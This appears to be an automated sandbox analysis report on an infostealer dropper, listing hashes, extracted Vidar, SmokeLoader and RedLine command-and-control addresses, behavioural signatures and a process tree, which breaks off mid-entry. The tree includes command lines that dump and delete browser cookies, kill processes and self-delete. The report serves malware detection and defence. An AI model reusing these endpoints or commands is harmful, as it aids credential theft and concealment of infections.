Resubmissions

13-08-2021 10:16

210813-wpta271jdx 10

08-08-2021 23:00

210808-fgs5g9pxfs 10

07-08-2021 23:12

210807-g2jw1lmd4a 10

07-08-2021 16:10

210807-51nhct4kfx 10

06-08-2021 23:43

210806-gc2271nxwj 10

06-08-2021 06:00

210806-f443x39x8a 10

05-08-2021 17:08

210805-97y6banvvx 10

04-08-2021 17:25

210804-hkxx2ntr8x 10

04-08-2021 12:12

210804-rjbg4b4y7n 10

03-08-2021 17:12

210803-r2h7ytjwqj 10

Analysis

  • max time kernel
    162s
  • max time network
    1816s
  • platform
    windows10_x64
  • resource
    win10v20210408
  • submitted
    29-07-2021 11:26

General

  • Target

    8 (11).exe

  • Size

    3.0MB

  • MD5

    bb072cad921aa5ce8b97706ce01bc570

  • SHA1

    18bf034906c1341b7817e7361ad27a4425d820bd

  • SHA256

    817a50d00909383bbef41e6f4e61b527d55f0873bcf745b29dbba75f52fe2e97

  • SHA512

    d40e5f77d882ed29bd9de5a6848072e2f81cd02176955e2b1a4aedcdf4eb687d77bebe33cef0c7d702bc828181755f86e2564523d476adbb785f396a5ce1d474

Malware Config

Extracted

Family

vidar

Version

39.6

Botnet

933

C2

https://sslamlssa1.tumblr.com/

Attributes
  • profile_id

    933

Extracted

Family

smokeloader

Version

2020

C2

http://conceitosseg.com/upload/

http://integrasidata.com/upload/

http://ozentekstil.com/upload/

http://finbelportal.com/upload/

http://telanganadigital.com/upload/

http://readinglistforjuly1.xyz/

http://readinglistforjuly2.xyz/

http://readinglistforjuly3.xyz/

http://readinglistforjuly4.xyz/

http://readinglistforjuly5.xyz/

http://readinglistforjuly6.xyz/

http://readinglistforjuly7.xyz/

http://readinglistforjuly8.xyz/

http://readinglistforjuly9.xyz/

http://readinglistforjuly10.xyz/

http://readinglistforjuly1.site/

http://readinglistforjuly2.site/

http://readinglistforjuly3.site/

http://readinglistforjuly4.site/

http://readinglistforjuly5.site/

rc4.i32
rc4.i32
rc4.i32
rc4.i32

Extracted

Family

redline

Botnet

5k_NEW_SERV

C2

45.14.49.117:14251

Extracted

Family

redline

C2

109.234.34.165:22204

Extracted

Family

redline

Botnet

28_7_r

C2

zertypelil.xyz:80

Signatures

  • Modifies Windows Defender Real-time Protection settings 3 TTPs
  • Process spawned unexpected child process 2 IoCs

    This typically indicates the parent process was compromised via an exploit or macro.

  • RedLine

    RedLine Stealer is a malware family written in C#, first appearing in early 2020.

  • RedLine Payload 7 IoCs
  • SmokeLoader

    Modular backdoor trojan in use since 2014.

  • Socelars

    Socelars is an infostealer targeting browser cookies and credit card credentials.

  • Socelars Payload 2 IoCs
  • Suspicious use of NtCreateProcessExOtherParentProcess 2 IoCs
  • Suspicious use of NtCreateUserProcessOtherParentProcess 1 IoCs
  • Vidar

    Vidar is an infostealer based on Arkei stealer.

  • suricata: ET MALWARE GCleaner Downloader Activity M1
  • suricata: ET MALWARE Generic Password Stealer User Agent Detected (RookIE)
  • suricata: ET MALWARE Potential Dridex.Maldoc Minimal Executable Request
  • suricata: ET MALWARE Sharik/Smoke CnC Beacon 11
  • suricata: ET MALWARE Suspicious Zipped Filename in Outbound POST Request (Passwords.txt)
  • suricata: ET MALWARE Vidar/Arkei Stealer Client Data Upload
  • suricata: ET MALWARE Vidar/Arkei/Megumin/Oski Stealer Data Exfil
  • suricata: ET MALWARE Win32/Kelihos.F exe Download 2
  • Identifies VirtualBox via ACPI registry values (likely anti-VM) 2 TTPs
  • Vidar Stealer 2 IoCs
  • ASPack v2.12-2.42 9 IoCs

    Detects executables packed with ASPack v2.12-2.42

  • Downloads MZ/PE file
  • Executes dropped EXE 64 IoCs
  • UPX packed file 2 IoCs

    Detects executables packed with UPX/modified UPX open source packer.

  • Checks BIOS information in registry 2 TTPs 4 IoCs

    BIOS information is often read in order to detect sandboxing environments.

  • Checks computer location settings 2 TTPs 1 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Drops startup file 2 IoCs
  • Loads dropped DLL 26 IoCs
  • Reads user/profile data of local email clients 2 TTPs

    Email clients store some user data on disk where infostealers will often target it.

  • Reads user/profile data of web browsers 2 TTPs

    Infostealers often target stored browser data, which can include saved credentials etc.

  • Themida packer 2 IoCs

    Detects Themida, an advanced Windows software protection system.

  • Accesses 2FA software files, possible credential harvesting 2 TTPs
  • Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
  • Adds Run key to start application 2 TTPs 2 IoCs
  • Checks for any installed AV software in registry 1 TTPs 1 IoCs
  • Checks installed software on the system 1 TTPs

    Looks up Uninstall key entries in the registry to enumerate software on the system.

  • Checks whether UAC is enabled 1 TTPs 3 IoCs
  • Legitimate hosting services abused for malware hosting/C2 1 TTPs
  • Looks up external IP address via web service 5 IoCs

    Uses a legitimate IP lookup service to find the infected system's external IP.

  • Drops file in System32 directory 3 IoCs
  • Suspicious use of NtSetInformationThreadHideFromDebugger 2 IoCs
  • Suspicious use of SetThreadContext 7 IoCs
  • autoit_exe 2 IoCs

    AutoIT scripts compiled to PE executables.

  • Drops file in Program Files directory 64 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

  • Program crash 9 IoCs
  • Checks SCSI registry key(s) 3 TTPs 6 IoCs

    SCSI information is often read in order to detect sandboxing environments.

  • Checks processor information in registry 2 TTPs 6 IoCs

    Processor information is often read in order to detect sandboxing environments.

  • Delays execution with timeout.exe 3 IoCs
  • Download via BitsAdmin 1 TTPs 1 IoCs
  • Kills process with taskkill 5 IoCs
  • Modifies data under HKEY_USERS 64 IoCs
  • Modifies registry class 26 IoCs
  • Modifies system certificate store 2 TTPs 2 IoCs
  • Runs ping.exe 1 TTPs 2 IoCs
  • Script User-Agent 1 IoCs

    Uses user-agent string associated with script host/environment.

  • Suspicious behavior: EnumeratesProcesses 64 IoCs
  • Suspicious behavior: GetForegroundWindowSpam 1 IoCs
  • Suspicious behavior: MapViewOfSection 4 IoCs
  • Suspicious use of AdjustPrivilegeToken 64 IoCs
  • Suspicious use of FindShellTrayWindow 13 IoCs
  • Suspicious use of SendNotifyMessage 8 IoCs
  • Suspicious use of UnmapMainImage 1 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs

Processes

  • c:\windows\system32\svchost.exe
    c:\windows\system32\svchost.exe -k netsvcs -s WpnService
    1⤵
      PID:2804
    • c:\windows\system32\svchost.exe
      c:\windows\system32\svchost.exe -k netsvcs -s Winmgmt
      1⤵
        PID:2788
      • c:\windows\system32\svchost.exe
        c:\windows\system32\svchost.exe -k netsvcs -s Browser
        1⤵
          PID:2712
        • c:\windows\system32\svchost.exe
          c:\windows\system32\svchost.exe -k netsvcs -s IKEEXT
          1⤵
            PID:2588
          • c:\windows\system32\svchost.exe
            c:\windows\system32\svchost.exe -k netsvcs -s LanmanServer
            1⤵
              PID:2536
            • c:\windows\system32\svchost.exe
              c:\windows\system32\svchost.exe -k netsvcs -s ShellHWDetection
              1⤵
                PID:1872
              • c:\windows\system32\svchost.exe
                c:\windows\system32\svchost.exe -k netsvcs -s SENS
                1⤵
                  PID:1396
                • c:\windows\system32\svchost.exe
                  c:\windows\system32\svchost.exe -k netsvcs -s UserManager
                  1⤵
                    PID:1264
                  • c:\windows\system32\svchost.exe
                    c:\windows\system32\svchost.exe -k netsvcs -s Themes
                    1⤵
                      PID:1196
                    • c:\windows\system32\svchost.exe
                      c:\windows\system32\svchost.exe -k netsvcs -s ProfSvc
                      1⤵
                        PID:1076
                      • c:\windows\system32\svchost.exe
                        c:\windows\system32\svchost.exe -k netsvcs -s Schedule
                        1⤵
                        • Drops file in System32 directory
                        PID:408
                        • C:\Users\Admin\AppData\Roaming\udwwgsr
                          C:\Users\Admin\AppData\Roaming\udwwgsr
                          2⤵
                            PID:4492
                          • C:\Users\Admin\AppData\Roaming\rgwwgsr
                            C:\Users\Admin\AppData\Roaming\rgwwgsr
                            2⤵
                              PID:4356
                              • C:\Users\Admin\AppData\Roaming\rgwwgsr
                                C:\Users\Admin\AppData\Roaming\rgwwgsr
                                3⤵
                                  PID:2648
                              • C:\Users\Admin\AppData\Roaming\rgwwgsr
                                C:\Users\Admin\AppData\Roaming\rgwwgsr
                                2⤵
                                  PID:5140
                                  • C:\Users\Admin\AppData\Roaming\rgwwgsr
                                    C:\Users\Admin\AppData\Roaming\rgwwgsr
                                    3⤵
                                      PID:4876
                                  • C:\Users\Admin\AppData\Roaming\udwwgsr
                                    C:\Users\Admin\AppData\Roaming\udwwgsr
                                    2⤵
                                      PID:5316
                                    • C:\Users\Admin\AppData\Roaming\rgwwgsr
                                      C:\Users\Admin\AppData\Roaming\rgwwgsr
                                      2⤵
                                        PID:3136
                                        • C:\Users\Admin\AppData\Roaming\rgwwgsr
                                          C:\Users\Admin\AppData\Roaming\rgwwgsr
                                          3⤵
                                            PID:3524
                                        • C:\Users\Admin\AppData\Roaming\udwwgsr
                                          C:\Users\Admin\AppData\Roaming\udwwgsr
                                          2⤵
                                            PID:2932
                                        • c:\windows\system32\svchost.exe
                                          c:\windows\system32\svchost.exe -k netsvcs -s gpsvc
                                          1⤵
                                            PID:68
                                          • C:\Users\Admin\AppData\Local\Temp\8 (11).exe
                                            "C:\Users\Admin\AppData\Local\Temp\8 (11).exe"
                                            1⤵
                                            • Suspicious use of WriteProcessMemory
                                            PID:672
                                            • C:\Users\Admin\AppData\Local\Temp\setup_installer.exe
                                              "C:\Users\Admin\AppData\Local\Temp\setup_installer.exe"
                                              2⤵
                                              • Executes dropped EXE
                                              • Suspicious use of WriteProcessMemory
                                              PID:3200
                                              • C:\Users\Admin\AppData\Local\Temp\7zS08C23884\setup_install.exe
                                                "C:\Users\Admin\AppData\Local\Temp\7zS08C23884\setup_install.exe"
                                                3⤵
                                                • Executes dropped EXE
                                                • Loads dropped DLL
                                                • Suspicious use of WriteProcessMemory
                                                PID:2960
                                                • C:\Windows\SysWOW64\cmd.exe
                                                  C:\Windows\system32\cmd.exe /c sonia_2.exe
                                                  4⤵
                                                  • Suspicious use of WriteProcessMemory
                                                  PID:1424
                                                  • C:\Users\Admin\AppData\Local\Temp\7zS08C23884\sonia_2.exe
                                                    sonia_2.exe
                                                    5⤵
                                                    • Executes dropped EXE
                                                    • Loads dropped DLL
                                                    • Checks SCSI registry key(s)
                                                    • Suspicious behavior: EnumeratesProcesses
                                                    • Suspicious behavior: MapViewOfSection
                                                    PID:3592
                                                • C:\Windows\SysWOW64\cmd.exe
                                                  C:\Windows\system32\cmd.exe /c sonia_3.exe
                                                  4⤵
                                                  • Suspicious use of WriteProcessMemory
                                                  PID:2300
                                                  • C:\Users\Admin\AppData\Local\Temp\7zS08C23884\sonia_3.exe
                                                    sonia_3.exe
                                                    5⤵
                                                    • Executes dropped EXE
                                                    • Modifies system certificate store
                                                    PID:2256
                                                    • C:\Windows\SysWOW64\WerFault.exe
                                                      C:\Windows\SysWOW64\WerFault.exe -u -p 2256 -s 1612
                                                      6⤵
                                                      • Suspicious use of NtCreateProcessExOtherParentProcess
                                                      • Program crash
                                                      PID:4808
                                                • C:\Windows\SysWOW64\cmd.exe
                                                  C:\Windows\system32\cmd.exe /c sonia_5.exe
                                                  4⤵
                                                  • Suspicious use of WriteProcessMemory
                                                  PID:2160
                                                  • C:\Users\Admin\AppData\Local\Temp\7zS08C23884\sonia_5.exe
                                                    sonia_5.exe
                                                    5⤵
                                                    • Executes dropped EXE
                                                    • Checks computer location settings
                                                    PID:856
                                                    • C:\Users\Admin\Documents\0EcjRtj5HYkRn9XGgnQpoOgA.exe
                                                      "C:\Users\Admin\Documents\0EcjRtj5HYkRn9XGgnQpoOgA.exe"
                                                      6⤵
                                                      • Executes dropped EXE
                                                      • Suspicious use of SetThreadContext
                                                      PID:4636
                                                      • C:\Users\Admin\Documents\0EcjRtj5HYkRn9XGgnQpoOgA.exe
                                                        "C:\Users\Admin\Documents\0EcjRtj5HYkRn9XGgnQpoOgA.exe"
                                                        7⤵
                                                        • Executes dropped EXE
                                                        • Checks SCSI registry key(s)
                                                        • Suspicious behavior: MapViewOfSection
                                                        PID:4324
                                                    • C:\Users\Admin\Documents\Vunh26hg0vN0fNDvI_0DSfxw.exe
                                                      "C:\Users\Admin\Documents\Vunh26hg0vN0fNDvI_0DSfxw.exe"
                                                      6⤵
                                                      • Executes dropped EXE
                                                      • Suspicious use of SetThreadContext
                                                      PID:4620
                                                      • C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                                        "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"
                                                        7⤵
                                                          PID:3704
                                                        • C:\Windows\SysWOW64\WerFault.exe
                                                          C:\Windows\SysWOW64\WerFault.exe -u -p 4620 -s 248
                                                          7⤵
                                                          • Suspicious use of NtCreateProcessExOtherParentProcess
                                                          • Program crash
                                                          • Suspicious use of AdjustPrivilegeToken
                                                          PID:4952
                                                      • C:\Users\Admin\Documents\HBmIgHcMaIBPUsIJY_HT4W4b.exe
                                                        "C:\Users\Admin\Documents\HBmIgHcMaIBPUsIJY_HT4W4b.exe"
                                                        6⤵
                                                        • Executes dropped EXE
                                                        • Suspicious use of AdjustPrivilegeToken
                                                        PID:4608
                                                        • C:\Users\Admin\AppData\Roaming\2665877.exe
                                                          "C:\Users\Admin\AppData\Roaming\2665877.exe"
                                                          7⤵
                                                          • Executes dropped EXE
                                                          PID:4488
                                                          • C:\Windows\system32\WerFault.exe
                                                            C:\Windows\system32\WerFault.exe -u -p 4488 -s 1896
                                                            8⤵
                                                            • Program crash
                                                            PID:5636
                                                        • C:\Users\Admin\AppData\Roaming\4393549.exe
                                                          "C:\Users\Admin\AppData\Roaming\4393549.exe"
                                                          7⤵
                                                          • Executes dropped EXE
                                                          • Adds Run key to start application
                                                          PID:2388
                                                          • C:\Users\Admin\AppData\Roaming\WinHost\WinHoster.exe
                                                            "C:\Users\Admin\AppData\Roaming\WinHost\WinHoster.exe"
                                                            8⤵
                                                            • Executes dropped EXE
                                                            PID:4252
                                                        • C:\Users\Admin\AppData\Roaming\2945434.exe
                                                          "C:\Users\Admin\AppData\Roaming\2945434.exe"
                                                          7⤵
                                                          • Executes dropped EXE
                                                          PID:4200
                                                      • C:\Users\Admin\Documents\pf0yYeEWUhuD3yRLEImgHEma.exe
                                                        "C:\Users\Admin\Documents\pf0yYeEWUhuD3yRLEImgHEma.exe"
                                                        6⤵
                                                        • Executes dropped EXE
                                                        • Suspicious use of SetThreadContext
                                                        PID:4596
                                                        • C:\Users\Admin\Documents\pf0yYeEWUhuD3yRLEImgHEma.exe
                                                          C:\Users\Admin\Documents\pf0yYeEWUhuD3yRLEImgHEma.exe
                                                          7⤵
                                                          • Executes dropped EXE
                                                          PID:3856
                                                      • C:\Users\Admin\Documents\oS8uDo5IZgD0affMjtQ6Tq_J.exe
                                                        "C:\Users\Admin\Documents\oS8uDo5IZgD0affMjtQ6Tq_J.exe"
                                                        6⤵
                                                        • Executes dropped EXE
                                                        PID:4696
                                                        • C:\Users\Admin\Documents\oS8uDo5IZgD0affMjtQ6Tq_J.exe
                                                          "C:\Users\Admin\Documents\oS8uDo5IZgD0affMjtQ6Tq_J.exe"
                                                          7⤵
                                                            PID:5532
                                                            • C:\Program Files\Mozilla Firefox\firefox.exe
                                                              "C:\Program Files\Mozilla Firefox\firefox.exe"
                                                              8⤵
                                                                PID:5540
                                                                • C:\Program Files\Mozilla Firefox\firefox.exe
                                                                  "C:\Program Files\Mozilla Firefox\firefox.exe"
                                                                  9⤵
                                                                    PID:5152
                                                                    • C:\Program Files\Mozilla Firefox\firefox.exe
                                                                      "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="5152.0.1427228888\1026001066" -parentBuildID 20200403170909 -prefsHandle 1524 -prefMapHandle 1516 -prefsLen 1 -prefMapSize 219680 -appdir "C:\Program Files\Mozilla Firefox\browser" - 5152 "\\.\pipe\gecko-crash-server-pipe.5152" 1604 gpu
                                                                      10⤵
                                                                        PID:5024
                                                                  • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                    "C:\Program Files\Google\Chrome\Application\chrome.exe"
                                                                    8⤵
                                                                      PID:4052
                                                                      • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=89.0.4389.114 --initial-client-data=0xd0,0xd4,0xd8,0xac,0xdc,0x7ffd0daf4f50,0x7ffd0daf4f60,0x7ffd0daf4f70
                                                                        9⤵
                                                                          PID:5816
                                                                        • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                          "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --field-trial-handle=1812,4868937676958918799,14746868530502466490,131072 --gpu-preferences=SAAAAAAAAADgAAAwAAAAAAAAAAAAAAAAAABgAAAAAAAoAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAB4AAAAAAAAAHgAAAAAAAAAKAAAAAQAAAAgAAAAAAAAACgAAAAAAAAAMAAAAAAAAAA4AAAAAAAAABAAAAAAAAAAAAAAAAUAAAAQAAAAAAAAAAAAAAAGAAAAEAAAAAAAAAABAAAABQAAABAAAAAAAAAAAQAAAAYAAAAIAAAAAAAAAAgAAAAAAAAA --mojo-platform-channel-handle=1824 /prefetch:2
                                                                          9⤵
                                                                            PID:4084
                                                                          • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                            "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=1812,4868937676958918799,14746868530502466490,131072 --lang=en-US --service-sandbox-type=network --mojo-platform-channel-handle=1872 /prefetch:8
                                                                            9⤵
                                                                              PID:4508
                                                                            • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                              "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=1812,4868937676958918799,14746868530502466490,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=1884 /prefetch:8
                                                                              9⤵
                                                                                PID:5652
                                                                              • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1812,4868937676958918799,14746868530502466490,131072 --lang=en-US --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=7 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=2608 /prefetch:1
                                                                                9⤵
                                                                                  PID:4928
                                                                                • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1812,4868937676958918799,14746868530502466490,131072 --lang=en-US --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=2616 /prefetch:1
                                                                                  9⤵
                                                                                    PID:5656
                                                                                  • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                    "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1812,4868937676958918799,14746868530502466490,131072 --lang=en-US --extension-process --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3384 /prefetch:1
                                                                                    9⤵
                                                                                      PID:4600
                                                                                    • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                      "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1812,4868937676958918799,14746868530502466490,131072 --lang=en-US --extension-process --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=8 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3572 /prefetch:1
                                                                                      9⤵
                                                                                        PID:5040
                                                                                      • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1812,4868937676958918799,14746868530502466490,131072 --lang=en-US --extension-process --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=9 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3724 /prefetch:1
                                                                                        9⤵
                                                                                          PID:3752
                                                                                        • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                          "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1812,4868937676958918799,14746868530502466490,131072 --lang=en-US --extension-process --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=10 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3892 /prefetch:1
                                                                                          9⤵
                                                                                            PID:4080
                                                                                          • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                            "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1812,4868937676958918799,14746868530502466490,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=3936 /prefetch:8
                                                                                            9⤵
                                                                                              PID:5060
                                                                                            • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                              "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1812,4868937676958918799,14746868530502466490,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5868 /prefetch:8
                                                                                              9⤵
                                                                                                PID:804
                                                                                              • C:\Program Files\Google\Chrome\Application\89.0.4389.114\Installer\chrmstp.exe
                                                                                                "C:\Program Files\Google\Chrome\Application\89.0.4389.114\Installer\chrmstp.exe" --configure-user-settings --verbose-logging --system-level --channel --force-configure-user-settings
                                                                                                9⤵
                                                                                                  PID:5780
                                                                                                  • C:\Program Files\Google\Chrome\Application\89.0.4389.114\Installer\chrmstp.exe
                                                                                                    "C:\Program Files\Google\Chrome\Application\89.0.4389.114\Installer\chrmstp.exe" --type=crashpad-handler /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler --database=C:\Windows\TEMP\Crashpad --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=89.0.4389.114 --initial-client-data=0x23c,0x240,0x244,0x218,0x248,0x7ff74281a890,0x7ff74281a8a0,0x7ff74281a8b0
                                                                                                    10⤵
                                                                                                      PID:4276
                                                                                                  • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                    "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1812,4868937676958918799,14746868530502466490,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2056 /prefetch:8
                                                                                                    9⤵
                                                                                                      PID:5916
                                                                                                    • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                      "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1812,4868937676958918799,14746868530502466490,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=1676 /prefetch:8
                                                                                                      9⤵
                                                                                                        PID:736
                                                                                                      • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --field-trial-handle=1812,4868937676958918799,14746868530502466490,131072 --disable-gpu-sandbox --use-gl=disabled --gpu-vendor-id=5140 --gpu-device-id=140 --gpu-sub-system-id=0 --gpu-revision=0 --gpu-driver-version=10.0.15063.0 --gpu-preferences=SAAAAAAAAADoAAAwAAAAAAAAAAAAAAAAAABgAAAQAAAoAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAB4AAAAAAAAAHgAAAAAAAAAKAAAAAQAAAAgAAAAAAAAACgAAAAAAAAAMAAAAAAAAAA4AAAAAAAAABAAAAAAAAAAAAAAAAUAAAAQAAAAAAAAAAAAAAAGAAAAEAAAAAAAAAABAAAABQAAABAAAAAAAAAAAQAAAAYAAAAIAAAAAAAAAAgAAAAAAAAA --mojo-platform-channel-handle=1596 /prefetch:2
                                                                                                        9⤵
                                                                                                          PID:5060
                                                                                                      • C:\Windows\SysWOW64\cmd.exe
                                                                                                        "cmd.exe" /C taskkill /F /PID 5532 && choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\Documents\oS8uDo5IZgD0affMjtQ6Tq_J.exe"
                                                                                                        8⤵
                                                                                                          PID:5768
                                                                                                          • C:\Windows\SysWOW64\taskkill.exe
                                                                                                            taskkill /F /PID 5532
                                                                                                            9⤵
                                                                                                            • Kills process with taskkill
                                                                                                            PID:4560
                                                                                                        • C:\Windows\SysWOW64\cmd.exe
                                                                                                          "cmd.exe" /C taskkill /F /PID 5532 && choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\Documents\oS8uDo5IZgD0affMjtQ6Tq_J.exe"
                                                                                                          8⤵
                                                                                                            PID:4332
                                                                                                            • C:\Windows\SysWOW64\taskkill.exe
                                                                                                              taskkill /F /PID 5532
                                                                                                              9⤵
                                                                                                              • Kills process with taskkill
                                                                                                              PID:5840
                                                                                                      • C:\Users\Admin\Documents\cAHBOHwj2vBeE_x4NVmzpmRg.exe
                                                                                                        "C:\Users\Admin\Documents\cAHBOHwj2vBeE_x4NVmzpmRg.exe"
                                                                                                        6⤵
                                                                                                        • Executes dropped EXE
                                                                                                        PID:4688
                                                                                                        • C:\Users\Admin\AppData\Local\Temp\11111.exe
                                                                                                          C:\Users\Admin\AppData\Local\Temp\11111.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                                                                                          7⤵
                                                                                                          • Executes dropped EXE
                                                                                                          PID:4420
                                                                                                        • C:\Users\Admin\AppData\Local\Temp\11111.exe
                                                                                                          C:\Users\Admin\AppData\Local\Temp\11111.exe /DeleteCookiesWildcard "*.facebook.com"
                                                                                                          7⤵
                                                                                                            PID:5048
                                                                                                          • C:\Users\Admin\AppData\Local\Temp\11111.exe
                                                                                                            C:\Users\Admin\AppData\Local\Temp\11111.exe /CookiesFile "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Profile 2\Cookies" /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                                                                                            7⤵
                                                                                                            • Executes dropped EXE
                                                                                                            PID:1520
                                                                                                          • C:\Users\Admin\AppData\Local\Temp\11111.exe
                                                                                                            C:\Users\Admin\AppData\Local\Temp\11111.exe /CookiesFile "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Profile 2\Cookies" /DeleteCookiesWildcard "*.facebook.com"
                                                                                                            7⤵
                                                                                                            • Executes dropped EXE
                                                                                                            PID:4956
                                                                                                          • C:\Users\Admin\AppData\Local\Temp\22222.exe
                                                                                                            C:\Users\Admin\AppData\Local\Temp\22222.exe /CookiesFile "C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cookies" /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                                                                                            7⤵
                                                                                                              PID:5700
                                                                                                            • C:\Users\Admin\AppData\Local\Temp\22222.exe
                                                                                                              C:\Users\Admin\AppData\Local\Temp\22222.exe /CookiesFile "C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cookies" /DeleteCookiesWildcard "*.facebook.com"
                                                                                                              7⤵
                                                                                                                PID:5752
                                                                                                              • C:\Users\Admin\AppData\Local\Temp\22222.exe
                                                                                                                C:\Users\Admin\AppData\Local\Temp\22222.exe /CookiesFile "C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Profile 1\Cookies" /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                                                                                                7⤵
                                                                                                                • Executes dropped EXE
                                                                                                                PID:5632
                                                                                                              • C:\Users\Admin\AppData\Local\Temp\22222.exe
                                                                                                                C:\Users\Admin\AppData\Local\Temp\22222.exe /CookiesFile "C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Profile 1\Cookies" /DeleteCookiesWildcard "*.facebook.com"
                                                                                                                7⤵
                                                                                                                • Executes dropped EXE
                                                                                                                PID:5744
                                                                                                            • C:\Users\Admin\Documents\R5MdYW3mo8aoNF_Puiked9rb.exe
                                                                                                              "C:\Users\Admin\Documents\R5MdYW3mo8aoNF_Puiked9rb.exe"
                                                                                                              6⤵
                                                                                                              • Executes dropped EXE
                                                                                                              • Suspicious use of AdjustPrivilegeToken
                                                                                                              PID:4796
                                                                                                              • C:\Windows\SysWOW64\cmd.exe
                                                                                                                cmd.exe /c taskkill /f /im chrome.exe
                                                                                                                7⤵
                                                                                                                  PID:4004
                                                                                                                  • C:\Windows\SysWOW64\taskkill.exe
                                                                                                                    taskkill /f /im chrome.exe
                                                                                                                    8⤵
                                                                                                                    • Kills process with taskkill
                                                                                                                    PID:1600
                                                                                                              • C:\Users\Admin\Documents\xVGPivdAdOmuSG5DvQu878uH.exe
                                                                                                                "C:\Users\Admin\Documents\xVGPivdAdOmuSG5DvQu878uH.exe"
                                                                                                                6⤵
                                                                                                                • Executes dropped EXE
                                                                                                                • Suspicious use of FindShellTrayWindow
                                                                                                                • Suspicious use of SendNotifyMessage
                                                                                                                PID:4824
                                                                                                                • C:\Users\Public\run.exe
                                                                                                                  C:\Users\Public\run.exe
                                                                                                                  7⤵
                                                                                                                  • Executes dropped EXE
                                                                                                                  • Suspicious use of SetThreadContext
                                                                                                                  PID:5048
                                                                                                                  • C:\Users\Public\run.exe
